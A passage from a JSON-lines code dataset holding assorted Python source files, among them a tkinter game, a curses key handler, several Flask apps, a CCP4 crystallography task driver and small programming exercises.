80}\nBEST_MODEL = {'hidden_layer_sizes':(20,8), 'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 80}\n\n## these are supposed to be standard dimensions of img\n## not sure if discrepency actually affects things\n## or if i can just brute resize everything either\nprocessed_width = 100\nprocessed_height = 100\n\nconfig = {\n 'h' : 250,\n 'w' : 250,\n 'min_faces' : 10,\n 'aspect_ratio' : 0.4\n }\n\ndef setup_config(h = 250, w = 250, min_faces = 70, aspect_ratio = 0.4):\n config['h'] = h\n config['w'] = w\n config['min_faces'] = min_faces\n config['aspect_ratio'] = aspect_ratio\n","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"337502357","text":"from tkinter import *\r\n\r\nimport random\r\nimport winsound\r\n\r\nclass World:\r\n def __init__(self, master):\r\n self.master = master\r\n master.title(\"Squares class\")\r\n\r\n self.board = Frame(master)\r\n self.board.pack()\r\n\r\n self.canvas = Canvas(self.board, width=500, height=500, bg='black')\r\n self.canvas.pack(side=LEFT)\r\n\r\n self.left_coords = 125, 50, 175, 100\r\n self.right_coords = 325, 50, 375, 100\r\n self.side = self.left_coords, self.right_coords\r\n\r\n self.obj_coords = random.choice(self.side)\r\n self.obj = self.canvas.create_rectangle(self.obj_coords, fill='red')\r\n self.obj_coords = self.canvas.coords(self.obj)\r\n\r\n self.char = self.canvas.create_rectangle(125,400, 175,450, fill='green')\r\n\r\n self.info = Label(self.board, width=40, height=20, bg='black', fg='red', font='Courier',\r\n text=\"Press Start button to start\")\r\n self.info.pack()\r\n\r\n self.score = 0\r\n\r\n self.canvas.focus_set()\r\n self.canvas.bind(\"\", self.move_left)\r\n self.canvas.bind(\"\", self.move_right)\r\n \r\n self.start_button = Button(self.board, text=\"Start\",\r\n width=10, height=2,\r\n bg='black', fg='red', font=\"Courier\",\r\n cursor=\"hand2\", command=self.start)\r\n self.start_button.pack()\r\n\r\nclass Motor(World):\r\n def move_left(self, event):\r\n char_coords = 125,400, 175,450\r\n self.canvas.coords(self.char, char_coords)\r\n\r\n def move_right(self, event):\r\n char_coords = 325,400, 375,450\r\n self.canvas.coords(self.char, char_coords)\r\n\r\n def move(self):\r\n try:\r\n if self.obj_coords == [125.0, 500.0, 175.0, 550.0] or self.obj_coords == [325.0, 500.0, 375.0, 550.0]: #bottom\r\n winsound.Beep(1000, 100)\r\n self.score += 10\r\n score_text = \"+10 points!\" + \"\\n\" + \"Total score: \" + str(self.score)\r\n self.info.config(text=score_text)\r\n self.obj_coords = random.choice(self.side)\r\n self.canvas.coords(self.obj, self.obj_coords)\r\n self.move()\r\n\r\n elif self.canvas.coords(self.obj) == self.canvas.coords(self.char): #clash\r\n winsound.Beep(1000, 500)\r\n self.start_button.config(text=\"Restart\", command=self.restart)\r\n clash_text = \"Oops! you got hit! \\n Total score: \" + str(self.score) + \"\\n Press Restart button to restart game\"\r\n self.info.config(text=clash_text)\r\n clash_coords = self.canvas.coords(self.obj)\r\n self.canvas.delete(ALL)\r\n self.canvas.create_rectangle(clash_coords, fill=\"blue\")\r\n\r\n else: #keep moving\r\n winsound.Beep(800, 100)\r\n self.obj_coords = [self.obj_coords[0], self.obj_coords[1]+50, self.obj_coords[2], self.obj_coords[3]+50]\r\n self.canvas.coords(self.obj, self.obj_coords)\r\n self.after_id = root.after(25, self.move)\r\n except:\r\n pass\r\n\r\n def start(self):\r\n self.start_button.config(text=\"Pause\", command=self.pause)\r\n self.move()\r\n\r\n def pause(self):\r\n print(\"Paused\")\r\n if self.move is not None:\r\n root.after_cancel(self.after_id)\r\n self.start_button.config(text=\"Start\", command=self.start)\r\n\r\n def restart(self):\r\n self.master.destroy()\r\n master = Tk()\r\n game = All(master)\r\n\r\n\r\nclass All(Motor, World):\r\n pass\r\n \r\n\r\nroot = Tk()\r\n\r\ngame = All(root)\r\n","sub_path":"Squares class separate classes.py","file_name":"Squares class separate classes.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"470738163","text":"\"\"\"\nCurses keyboard handling.\n\nTo test keyboard response, run `python -m tbl.curses_keyboard`; press q to exit.\n\"\"\"\n\n#-------------------------------------------------------------------------------\n\nimport curses\nimport logging\nimport os\nimport time\n\n#-------------------------------------------------------------------------------\n\nESC = 27\n\nKEYS = {\n 0: \"C-SPACE\",\n 1: \"C-a\",\n 2: \"C-b\",\n 3: \"C-c\",\n 4: \"C-d\",\n 5: \"C-e\",\n 6: \"C-f\",\n 7: \"C-g\",\n 9: \"TAB\",\n 10: \"RETURN\",\n 11: \"C-k\",\n 12: \"C-l\",\n 14: \"C-n\",\n 15: \"C-o\",\n 16: \"C-p\",\n 17: \"C-q\",\n 18: \"C-r\",\n 19: \"C-s\",\n 20: \"C-t\",\n 21: \"C-u\",\n 22: \"C-v\",\n 23: \"C-w\",\n 24: \"C-x\",\n 25: \"C-y\",\n 26: \"C-z\",\n 27: \"ESC\",\n 32: \"SPACE\",\n 258: \"DOWN\",\n 259: \"UP\",\n 260: \"LEFT\",\n 261: \"RIGHT\",\n 262: \"HOME\",\n 265: \"F1\",\n 266: \"F2\",\n 267: \"F3\",\n 268: \"F4\",\n 269: \"F5\",\n 270: \"F6\",\n 271: \"F7\",\n 272: \"F8\",\n 273: \"F9\",\n 274: \"F10\",\n 275: \"F11\",\n 276: \"F12\",\n 330: \"DELETE\",\n 338: \"PAGEDOWN\",\n 339: \"PAGEUP\",\n 343: \"ENTER\",\n 360: \"END\",\n 393: \"S-LEFT\",\n 402: \"S-RIGHT\",\n\n curses.KEY_BACKSPACE: \"BACKSPACE\",\n} \n\nMETA_KEYS = {\n 98: \"M-LEFT\", # M-b\n 102: \"M-RIGHT\", # M-f \n}\n\ndef get_key(stdscr, interval=0.01):\n while True:\n meta = False\n c = stdscr.getch()\n if c == -1:\n # No character available.\n time.sleep(interval)\n continue\n\n if c == curses.ERR:\n # Not sure why we get these.\n continue\n\n if c == curses.KEY_RESIZE:\n sy, sx = stdscr.getmaxyx()\n return \"RESIZE\", (sx, sy)\n elif c == curses.KEY_MOUSE:\n _, x, y, _, state = curses.getmouse()\n # FIXME: Not sure if we have buttons 2/3 right.\n if state & curses.BUTTON1_CLICKED:\n key = \"LEFTCLICK\"\n elif state & curses.BUTTON1_DOUBLE_CLICKED:\n key = \"LEFTDBLCLICK\"\n elif state & curses.BUTTON2_CLICKED:\n key = \"RIGHTCLICK\"\n elif state & curses.BUTTON2_DOUBLE_CLICKED:\n key = \"RIGHTDBLCLICK\"\n elif state & curses.BUTTON3_CLICKED:\n key = \"MIDDLECLICK\"\n elif state & curses.BUTTON3_DOUBLE_CLICKED:\n key = \"MIDDLEDBLCLICK\"\n else:\n # Discard other messages, e.g. press/release.\n continue\n if state & curses.BUTTON_SHIFT:\n key = \"S-\" + key\n if state & curses.BUTTON_ALT:\n key = \"M-\" + key\n # FIXME: OS/X seems to produce press and release events for CTRL\n # mouse clicks, but not clicked events.\n if state & curses.BUTTON_CTRL:\n key = \"C-\" + key\n return key, (x, y)\n\n if c == ESC:\n # This might be an escape sequence. Read more.\n c = stdscr.getch()\n if c == -1:\n # Nope; a bare escape.\n return \"ESC\", None\n else:\n meta = True\n\n if meta:\n try:\n return META_KEYS[c], None\n except KeyError:\n pass\n\n try:\n key = KEYS[c]\n except KeyError:\n if 0 <= c < 128:\n key = chr(c)\n else:\n logging.warning(\"unrecognized key code: {}\".format(c))\n\n if meta:\n key = \"M-\" + key\n return key, None\n\n\n\n#-------------------------------------------------------------------------------\n# Testing\n\ndef main():\n os.environ[\"ESCDELAY\"] = \"0\"\n\n stdscr = curses.initscr()\n curses.noecho()\n curses.raw()\n curses.curs_set(False)\n\n # Enable mouse actions.\n curses.mousemask(curses.BUTTON1_CLICKED | curses.BUTTON1_DOUBLE_CLICKED)\n\n stdscr.keypad(True)\n stdscr.nodelay(True)\n stdscr.notimeout(True)\n\n try:\n history = []\n while True:\n key, arg = get_key(stdscr)\n k = \"{!r}, {!r}\".format(key, arg)\n history.append(k)\n if len(history) > 10:\n history.pop(0)\n stdscr.clear()\n for i in range(len(history)):\n stdscr.addstr(i, 2, history[i])\n if key == \"q\" or key == 113:\n break\n finally:\n curses.curs_set(True)\n curses.noraw()\n stdscr.keypad(False)\n curses.echo()\n curses.endwin()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tbl/curses_keyboard.py","file_name":"curses_keyboard.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"372196335","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\nimport tellme_trello\n\n\ndef read_file(name):\n with open(name) as fd:\n return fd.read()\n\nkeywords = ['django', 'web', 'html']\n\nsetup(\n name='tellme-trello',\n version=tellme_trello.__version__,\n description=tellme_trello.__doc__,\n long_description=read_file('README.rst'),\n author=tellme_trello.__author__,\n author_email=tellme_trello.__email__,\n license=tellme_trello.__license__,\n url=tellme_trello.__url__,\n keywords=keywords,\n packages=find_packages(exclude=[]),\n include_package_data=True,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Environment :: Console',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n)\n","sub_path":"pypi_install_script/tellme-trello-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375408711","text":"# 开发的主要目录, 代码基本都在这个目录中\nimport redis\nimport logging\n\nfrom flask import Flask, render_template, g\nfrom flask_session import Session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf.csrf import CSRFProtect, generate_csrf\nfrom logging.handlers import RotatingFileHandler\n\n# 创建数据库\n\n\ndb = SQLAlchemy()\n\n# 定义空redis存储对象,供视图调用!\nredis_store = None # type: redis.StrictRedis\n\n\ndef setup_log(config_name):\n # 设置日志的记录等级\n logging.basicConfig(level=config_name.LOG_LEVEL) # 调试debug级\n # 创建日志记录器,指明日志保存的路径、每个日志文件的最大大小、保存的日志文件个数上限\n file_log_handler = RotatingFileHandler(\"logs/log\", maxBytes=1024 * 1024 * 100, backupCount=10)\n # 创建日志记录的格式 日志等级 输入日志信息的文件名 行数 日志信息\n formatter = logging.Formatter('%(levelname)s %(filename)s:%(lineno)d %(message)s')\n # 为刚创建的日志记录器设置日志记录格式\n file_log_handler.setFormatter(formatter)\n # 为全局的日志工具对象(flask app使用的)添加日志记录器\n logging.getLogger().addHandler(file_log_handler)\n\n\n# 提供一个函数, 工厂方法, 方便的根据不同的参数, 实现不同的配置加载\ndef create_app(config_name):\n ''' 通过manager 传参,传入的是对象!,对象在setting 之中,对象属性来进行添加属性!\n 两次连接redis 一次连接是为了供视图使用,一次是为了存储session的值\n '''\n # 配置项目日志\n setup_log(config_name)\n\n app = Flask(__name__)\n\n app.config.from_object(config_name)\n\n # 几乎所有的扩展都支持这种创建方式\n db.init_app(app)\n\n # 创建redis对象\n global redis_store\n # 连接redis,返回对象供视图使用! decode_responses 表示将字节码转换成字符串\n redis_store = redis.StrictRedis(host=config_name.REDIS_HOST, port=config_name.REDIS_PORT, decode_responses=True)\n\n # 开启CSRF保护 --> 会启用csrf_token对比机制\n # 1. wtf中有函数可以直接生成\n # 2. 在请求钩子中进行设置\n # 3. ajax可以增加一个字段: headers:(\"X-CSRFToken\")\n # 4. 到时候会自动从cookie中获取csrftoken, 从ajax的参数中获取csrftoken, 然后进行对比\n\n CSRFProtect(app)\n from info.utils.common import user_login_data\n # 所有的请求进行检测,是否有404错误!\n @app.errorhandler(404)\n @user_login_data\n def page_not_found(_):\n user = g.user\n data = {\n \"user_info\": user.to_dict() if user else None\n }\n return render_template('news/404.html', data=data)\n\n # 请求钩子,每次请求都会设置 csrf_token值\n # 在每次请求之后, 生成csrf_token, 设置到cookie中\n @app.after_request\n def after_request(response):\n # token生成后,会缓存起来, 多次生成仍是同一个\n csrf_token = generate_csrf()\n # WTF扩展会自动将corf_token存入session, 然后通过flask-session扩展同步到服务器的redis中\n response.set_cookie('csrf_token', csrf_token)\n return response\n\n # 增加自定义过滤器\n from info.utils.common import do_index_class\n app.add_template_filter(do_index_class, 'index_class')\n\n # 设置Flask-Session扩展.\n # 将存在浏览器的cookie中的session数据, 同步到服务器的指定地址中(redis)\n Session(app)\n\n # 蓝图在用到的时候再导包, 可以当做固定规则\n from info.modules.index import index_blue\n # 注册蓝图对象\n app.register_blueprint(index_blue)\n\n from info.modules.passport import passport_blue\n app.register_blueprint(passport_blue)\n\n from info.modules.profile import profile_blue\n app.register_blueprint(profile_blue)\n\n from info.modules.news import news_blue\n app.register_blueprint(news_blue)\n # 将url_prefix='/admin'设置到这里是说明这个是管理员用户!(可选!)\n from info.modules.admin import admin_blue\n app.register_blueprint(admin_blue, url_prefix='/admin')\n\n return app\n","sub_path":"info/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252658859","text":"#!/bin/python3\n\n\"\"\"\nProblem: Read two integers and print two lines. The first line should contain integer division a//b. The second line should contain float division, a/b.\n- No rounding\n\nInput: First line should have integer a, second line should have integer b.\n\nOutput: Print the two divisions as described above.\n\"\"\"\n\ndef main():\n a = int(input())\n b = int(input())\n\n print(a//b)\n print(a/b)\n\nif __name__ == '__main__': main()\n","sub_path":"Python/introduction/easy/division.py","file_name":"division.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"350426326","text":"import numpy as np\nclass person_details:\n def __init__(self, name, lid_id):\n self.name = name\n self.lid_id = lid_id\n def displayEmployee(self):\n print(\"Name : \", self.name, \", library id: \", self.lid_id)\n def _welcomeMessage(self):\n print(\"\\nGreetings\", self.name, \"this is umkc library!\\n\")\n print(\"your details:\")\n print(\"Name:\", self.name, \"identificatino\", self.lib_id)\nclass location:\n def __init__(self,loc):\n self.loc = loc\n\n def displayaddress(self):\n print(\"Address is: \", self.loc)\nclass info(person_details, location):\n def __init__(self, name, lib_id, loc):\n self.type = \"user\"\n person_details.name = name\n person_details.lib_id = lib_id\n person_details._welcomeMessage(self)\n location.loc = loc\n location.displayaddress(self)\n\nclass Ainfo(person_details, location):\n def __init__(self, name, lib_id, loc):\n self.type = \"admin\"\n #super.__init__(name, 'navi')\n person_details.name = name\n person_details.lib_id = lib_id\n person_details._welcomeMessage(self)\n location.loc = loc\n location.displayaddress(self)\nclass book(object):\n def __init__(self):\n print(\"please enter your book:\")\n book_list = [\"S.no\", \"name of the book\", \"no.of days to return\"]\n row_count = [1, 2, 3]\n self.data = np.array([[1, 'happy', 10],\n [2, 'happy2', 20],\n [3, 'happy3', 30]])\n print(self.data)\n\n def changeList(self, type):\n if(type == \"Admin\"):\n print(\"\\nadmin can one use the books\\n\")\n decision = input(\"add one more:\")\n if(decision.upper() == \"YES\"):\n list = input(\"please enter the name of the book(sno,book, days you needed):\").split(\",\")\n np.append(self.data, list)\n print(np.append(self.data, list))\n else:\n print(\"please try again later\")\n\n\nuser = info('navi','maggi','233')\nb=book()\nadmin = Ainfo('happy','happy', '1234')\nc=book()\n\n#emp1 = person_details(\"z\", 2000)\n\n#emp2 = person_details(\"x\", 5000)\n#emp3= person_details(\"navi\", 7000)\n#emp4 = person_details(\"navi\", 7000)\n#emp1.displayEmployee()\n#emp2.displayEmployee()\n#emp3.displayEmployee()\n\n\n","sub_path":"lab-assignment5/source/managment.py","file_name":"managment.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"413779045","text":"from flask import Flask, render_template, request, redirect, url_for\nimport session_items as session\nimport pprint\nimport trello as t\npp = pprint.PrettyPrinter(indent=4)\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index(): \n items = t.get_items()\n statuses = t.get_app_board_lists()\n return render_template('index.html' , items=items, statuses=statuses)\nif __name__ == '__main__':\n app.run()\n\n# @app.route('/create', methods=['POST'])\n# def create():\n# session.add_item(request.form.get('newItemTitle') )\n# return redirect(url_for('index'), code=302)\n\n@app.route('/create', methods=['POST'])\ndef create():\n t.add_item('5f3d5425b0c82d22a3d25f72', request.form.get('newItemTitle'))\n return redirect(url_for('index'), code=302)\n\n@app.route('/view/', methods=['GET'])\ndef view(id):\n item=session.get_item(id)\n return render_template('item.html', item=item)\n\n@app.route('/save', methods=['POST'])\ndef save():\n id=request.form.get( 'itemId' )\n status=request.form.get( 'itemStatus' )\n title=request.form.get( 'itemTitle' )\n print(id)\n print(status)\n print(title)\n t.save_item(id, status, title)\n return redirect(url_for('index'), code=302)\n \n@app.route('/sort/', methods=['GET'])\ndef sort_items(sortType):\n unsorted_items = session.get_items()\n pp.pprint(unsorted_items)\n sorted_items = sorted(unsorted_items, key=lambda item: item[str(sortType)].upper())\n pp.pprint(sorted_items)\n return render_template('index.html' , items=sorted_items) \n\n@app.route('/delete/', methods=['POST'])\ndef delete(id):\n print(t.get_item(id))\n t.delete_item(id)\n return redirect(url_for('index'), code=302)\n\n@app.route('/complete_item/', methods=['POST'])\ndef complete_item(id):\n #session.delete_item(id)\n return redirect(url_for('index'), code=302)","sub_path":"todo-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375419125","text":"##!/usr/bin/python\n\n#\n# ============================================================================\n#\n# 16.11.17 <-- Date of Last Modification.\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ----------------------------------------------------------------------------\n#\n# ENSEMBLEPREPXYZ EXECUTABLE MODULE\n#\n# Command-line:\n# ccp4-python -m pycofe.tasks.ensembleprepxyz exeType jobDir jobId\n#\n# where:\n# exeType is either SHELL or SGE\n# jobDir is path to job directory, having:\n# jobDir/output : directory receiving output files with metadata of\n# all successful imports\n# jobDir/report : directory receiving HTML report\n#\n# Copyright (C) Eugene Krissinel, Andrey Lebedev 2017\n#\n# ============================================================================\n#\n\n# python native imports\nimport os\nimport sys\nimport shutil\n\n# ccp4-python imports\nimport pyrvapi\n\n# application imports\nimport basic\nfrom pycofe.proc import analyse_ensemble, coor\nfrom pycofe.dtypes import dtype_template, dtype_sequence\n\n\n# ============================================================================\n# Make Ensembler driver\n\nclass EnsemblePrepXYZ(basic.TaskDriver):\n\n # redefine name of input script file\n def file_stdin_path(self): return \"ensembler.script\"\n\n # make task-specific definitions\n def gesamt_report (self): return \"gesamt_report\"\n\n # ------------------------------------------------------------------------\n\n def run(self):\n\n # Prepare ensembler input\n # fetch input data\n\n seq = None\n if hasattr(self.input_data.data,\"seq\"): # optional data parameter\n seq = self.makeClass ( self.input_data.data.seq[0] )\n\n xyz = self.input_data.data.xyz\n\n # Just in case (of repeated run) remove ensemble output xyz file. When\n # ensembler succeeds, this file is created.\n\n if not self.outputFName:\n if seq:\n self.outputFName = os.path.splitext(seq.files[0])[0]\n else:\n self.outputFName = os.path.splitext(xyz[0].files[0])[0]\n\n outputFile = self.getXYZOFName()\n\n if os.path.isfile(outputFile):\n os.remove ( outputFile )\n\n if len(xyz)>1:\n\n # make a file with input script\n self.open_stdin()\n\n self.write_stdin (\n \"input\" +\\\n \"\\n{\"\n )\n\n for i in range(len(xyz)):\n xyz[i] = self.makeClass ( xyz[i] )\n fpath = xyz[i].getFilePath ( self.inputDir() )\n if xyz[i].chainSel != \"(all)\":\n base, ext = os.path.splitext ( xyz[i].getFileName(0) )\n fpath_sel = base + \"_\" + xyz[i].chainSel + ext\n coor.fetchChains ( fpath,-1,[xyz[i].chainSel],True,True,fpath_sel )\n self.write_stdin ( \"\\nmodel = \" + fpath_sel )\n else:\n self.write_stdin ( \"\\nmodel = \" + fpath )\n #xyz[i].chainSel\n\n output_style = \"merged\"\n #if len(xyz)==1:\n # fcopy = os.path.join(self.inputDir(),\"X_X_\" + xyz[0].getFileName())\n # shutil.copy2 ( xyz[0].getFilePath(self.inputDir()),fcopy )\n # self.write_stdin ( \"\\nmodel = \" + fcopy )\n # output_style = \"separate\"\n\n self.write_stdin (\n \"\\n}\" +\\\n \"\\noutput\" +\\\n \"\\n{\" +\\\n #\"\\nlocation = \" + \"./\" +\\ -- not needed, will write to current directory\n \"\\nroot = ensemble\"+\\\n \"\\nstyle = \" + output_style +\\\n \"\\nsort = input\" +\\\n \"\\n}\" +\\\n \"\\nconfiguration\" +\\\n \"\\n{\" +\\\n \"\\nsuperposition\" +\\\n \"\\n{\" +\\\n \"\\nmethod = \" + self.getParameter(self.task.parameters.sec1.contains.SUPERPOSITION_SEL,False) +\\\n \"\\nconvergence = \" + self.getParameter(self.task.parameters.sec2.contains.SUPCONV,False) +\\\n \"\\n}\" +\\\n \"\\nmapping = \" + self.getParameter(self.task.parameters.sec1.contains.MAPPING_SEL,False) +\\\n \"\\natoms = \" + self.getParameter(self.task.parameters.sec2.contains.ATOMNAMES,False) +\\\n \"\\nclustering = \" + self.getParameter(self.task.parameters.sec2.contains.CLUSTDIST,False) +\\\n \"\\nweighting\" +\\\n \"\\n{\" +\\\n \"\\nscheme = \" + self.getParameter(self.task.parameters.sec1.contains.WEIGHTING_SEL,False) +\\\n \"\\nconvergence = \" + self.getParameter(self.task.parameters.sec2.contains.WEIGHTCONV,False) +\\\n \"\\nincremental_damping_factor = \" + self.getParameter(self.task.parameters.sec2.contains.WEIGHTDFACTOR,False) +\\\n \"\\nmax_damping_factor = \" + self.getParameter(self.task.parameters.sec2.contains.WEIGHTMAXDFACTOR,False) +\\\n \"\\n\" + self.getParameter(self.task.parameters.sec1.contains.WEIGHTING_SEL,False) +\\\n \"\\n{\\n\" +\\\n \"\\ncritical = \" + self.getParameter(self.task.parameters.sec1.contains.RRCRITICAL,False) +\\\n \"\\n}\" +\\\n \"\\n}\" +\\\n \"\\ntrim = \" + self.getParameter(self.task.parameters.sec1.contains.TRIM_SEL,False) +\\\n \"\\ntrimming\" +\\\n \"\\n{\" +\\\n \"\\nthreshold = \" + self.getParameter(self.task.parameters.sec1.contains.TTHRESH,False) +\\\n \"\\n}\" +\\\n \"\\n}\\n\"\n )\n\n self.close_stdin()\n\n # Start ensembler\n self.runApp ( \"phaser.ensembler\",[\"--stdin\"] )\n\n #if len(xyz)==1:\n # for file in os.listdir(\".\"):\n # if file.startswith(\"ensemble_X_X_\"):\n # os.rename ( file,outputFile )\n # break\n os.rename ( \"ensemble_merged.pdb\",outputFile )\n\n else:\n # single xyz dataset on input\n xyz0 = self.makeClass ( xyz[0] )\n fpath = xyz0.getFilePath ( self.inputDir() )\n coor.fetchChains ( fpath,-1,[xyz0.chainSel],True,True,outputFile )\n #if xyz0.chainSel != \"(all)\":\n # coor.fetchChains ( fpath,-1,[xyz0.chainSel],True,True,outputFile )\n #else:\n # coor.fetchChains ( fpath,-1,['(all)'],True,True,outputFile )\n # os.rename ( fpath,outputFile )\n\n if os.path.isfile(outputFile):\n\n temp = dtype_template.DType ( self.job_id )\n for c in xyz:\n temp.addSubtypes ( c.subtype )\n ensemble = self.registerEnsemble ( temp.subtype,outputFile,checkout=True )\n if ensemble:\n if seq:\n ensemble.putSequence ( seq )\n self.putTitle ( \"Results\" )\n if len(xyz)>1:\n self.putSection ( self.gesamt_report(),\"Structural alignment\" )\n analyse_ensemble.run ( self,self.gesamt_report(),ensemble )\n else:\n ensemble.meta = None\n ensemble.rmsd = 1.0 # just to put in something\n self.putMessage (\n \"

Generated single-model ensemble (\" +\\\n str(ensemble.xyzmeta[\"xyz\"][0][\"chains\"][0][\"size\"]) +\\\n \" residues)

\" )\n\n if not seq:\n self.dataSerialNo += 1\n seq = dtype_sequence.DType ( self.job_id )\n seq.setFile ( \"(unknown)\" )\n seq.makeDName ( self.dataSerialNo )\n seq.files = [] # no files associated with unknown sequence\n seq.setSubtype ( \"unknown\" )\n self.outputDataBox.add_data ( seq )\n self.putMessage ( \"Associated with auto-generated \" +\\\n \"unknown sequence: \" +\\\n seq.dname + \"
 \" )\n else:\n self.putMessage ( \"Associated with sequence: \" +\\\n seq.dname + \"
 \" )\n\n self.putEnsembleWidget ( \"ensemble_btn\",\"Coordinates\",ensemble )\n ensemble.addDataAssociation ( seq.dataId )\n ensemble.sequence = seq\n if len(seq.files)>0:\n ensemble.files += [seq.files[0]]\n os.rename ( os.path.join(self.inputDir() ,seq.files[0]),\n os.path.join(self.outputDir(),seq.files[0]) )\n else:\n ensemble.setSubtype ( \"sequnk\" )\n\n else:\n self.putTitle ( \"No ensembles were made\" )\n self.fail ( \"\",\"No ensemblies made\" )\n return\n\n # close execution logs and quit\n\n # apparently log parser completes action when stdout is closed. this\n # may happen after STOP_POLL is issued, in which case parser's report\n # is not seen until the whole page is reloaded.\n # is there a way to flush generic parser at some moment?\n import time\n time.sleep(1)\n\n self.success()\n return\n\n\n# ============================================================================\n\nif __name__ == \"__main__\":\n\n drv = EnsemblePrepXYZ ( \"\",os.path.basename(__file__) )\n drv.start()\n","sub_path":"pycofe/tasks/ensembleprepxyz.py","file_name":"ensembleprepxyz.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"571226366","text":"def fact(n):\n\tn=n\n\ta=1\n\twhile (n>1):\n\t\ta=a*n\n\t\tn=n-1\n\treturn (a)\n\nx=\"y\"\nwhile(x==\"y\"):\n\tn=int(input(\"Dame un numero\"))\n\tf=fact(n)\n\twhile (n<0):\n\t\tn=int(input(\"error dame un numero positivo\"))\n\t\tf=fact(n)\n\tprint(\"El factorial de tu numero es:\",f)\n\tx=int(input(\"Quieres intentar otro numero? 1=si, 2=no:\"))\n\twhile (x!=1 and x!=2):\n\t\tprint (\"Error\")\n\t\tx=int(input(\"Quieres intentar otro numero? 1=si, 2=no:\"))\n","sub_path":"factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"20655202","text":"\n\n#calss header\nclass _TORONTO():\n\tdef __init__(self,): \n\t\tself.name = \"TORONTO\"\n\t\tself.definitions = [u'the largest city in Canada, and the capital of the province of Ontario']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_toronto.py","file_name":"_toronto.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202006711","text":"def load_data():\n p = 'input.txt'\n input_file = open(p,'r')\n data = input_file.readlines()\n for i,d in enumerate(data):\n data[i] = d.rstrip()\n input_file.close()\n return data\n\ndef get_solution():\n coords= load_data()\n for i,c in enumerate(coords):\n t = c.split(\", \")\n coords[i] = [int(t[0]),int(t[1])]\n max_area = getMaxArea(coords)\n print(max_area[1])\n\ndef getMaxArea(coords):\n max_x,max_y,min_x,min_y = get_boundaries(coords)\n x_bound = [max_x,min_x]\n y_bound = [max_y,min_y]\n areas = {}\n for x in range(min_x,max_x+1):\n for y in range(min_y,max_y+1):\n closest = get_closest_point([x,y],coords)\n t = x,y\n areas[t] = closest\n area_sizes = {}\n for _,coord in areas.items():\n if coord is None:\n continue\n existing_count = 0\n t = coord[0],coord[1]\n if t in area_sizes:\n existing_count = area_sizes[t]\n existing_count += 1\n area_sizes[t] = existing_count\n for coord,closest in areas.items():\n if is_infinite(coord,x_bound,y_bound):\n area_sizes[closest] = 0\n sorted_by_value = sorted(area_sizes.items(), key=lambda kv: kv[1], reverse=True)\n return sorted_by_value[0]\n\ndef get_closest_point(c,coords):\n distances = {}\n for cord in coords:\n dist = abs(cord[0]-c[0])+abs(cord[1]-c[1])\n l = cord[0],cord[1]\n distances[l] = dist\n sorted_by_value = sorted(distances.items(), key=lambda kv: kv[1])\n if sorted_by_value[0][1] != sorted_by_value[1][1]:\n return sorted_by_value[0][0]\n return None\n\ndef get_boundaries(coords):\n max_x = float('-inf')\n max_y = float('-inf')\n min_x = float('inf')\n min_y = float('inf')\n for c in coords:\n c_x = c[0]\n c_y = c[1]\n if c_x > max_x:\n max_x = c_x\n if c_x < min_x:\n min_x = c_x\n if c_y > max_y:\n max_y = c_y\n if c_y < min_y:\n min_y = c_y\n return max_x,max_y,min_x,min_y\ndef is_infinite(c,x_bound,y_bound):\n c_x = c[0]\n c_y = c[1]\n if c_x == x_bound[0] or c_x == x_bound[1]:\n return True\n if c_y == y_bound[0] or c_y == y_bound[1]:\n return True \n return False\n\nget_solution()","sub_path":"06/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"524840031","text":"from general.serializers import ProfileEditConstituentSerializer\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom constituent_operations.models import Message\nfrom constituent_operations.serializers import SendMessageSerializer\nfrom rest_framework.views import APIView\nfrom django.contrib.auth import 